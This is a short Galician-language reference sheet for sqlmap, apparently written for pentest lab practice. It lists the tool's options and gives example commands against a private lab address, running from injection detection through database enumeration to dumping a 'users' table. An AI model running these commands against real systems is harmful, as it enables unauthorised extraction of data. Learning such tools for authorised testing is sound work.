Ir ao contido

sqlmap - Explotador de SQL Injection

Descrición

Ferramenta automática para detectar e explotar vulnerabilidades SQL Injection.

Sintaxe básica

sqlmap -u <URL> [opcións]

Opcións principais

Opción Descrición
-u <URL> URL obxectivo
--data=<datos> Datos POST
-p <parámetro> Parámetro a testar
--cookie=<cookie> Cookie de sesión
--dbs Enumerar bases de datos
-D <db> Especificar base de datos
--tables Enumerar táboas
-T <táboa> Especificar táboa
--columns Enumerar columnas
-C <columnas> Especificar columnas
--dump Extraer datos
--risk=<1-3> Nivel de risco (1=baixo, 3=alto)
--level=<1-5> Nivel de tests (1=básico, 5=exhaustivo)
--batch Non facer preguntas interactivas
--threads=<n> Número de threads
--random-agent User-Agent aleatorio

Exemplos de uso

# Detección básica de SQL Injection
sqlmap -u "http://192.168.56.100/login.php?id=1"

# SQL Injection en POST
sqlmap -u "http://192.168.56.100/library/login/" \
  --data="username=admin&password=test" \
  -p username

# Con configuración agresiva
sqlmap -u "http://192.168.56.100/login" \
  --data="username=admin&password=test" \
  -p username \
  --risk=3 --level=5 \
  --batch --threads=10 --random-agent

# Enumerar bases de datos
sqlmap -u "http://192.168.56.100/login" \
  --data="username=admin&password=test" \
  -p username \
  --dbs

# Enumerar táboas dunha DB
sqlmap -u "http://192.168.56.100/login" \
  --data="username=admin&password=test" \
  -p username \
  -D library --tables

# Extraer datos dunha táboa
sqlmap -u "http://192.168.56.100/login" \
  --data="username=admin&password=test" \
  -p username \
  -D library -T users --dump

# Con cookie de sesión
sqlmap -u "http://192.168.56.100/page.php?id=1" \
  --cookie="PHPSESSID=abc123" \
  --dbs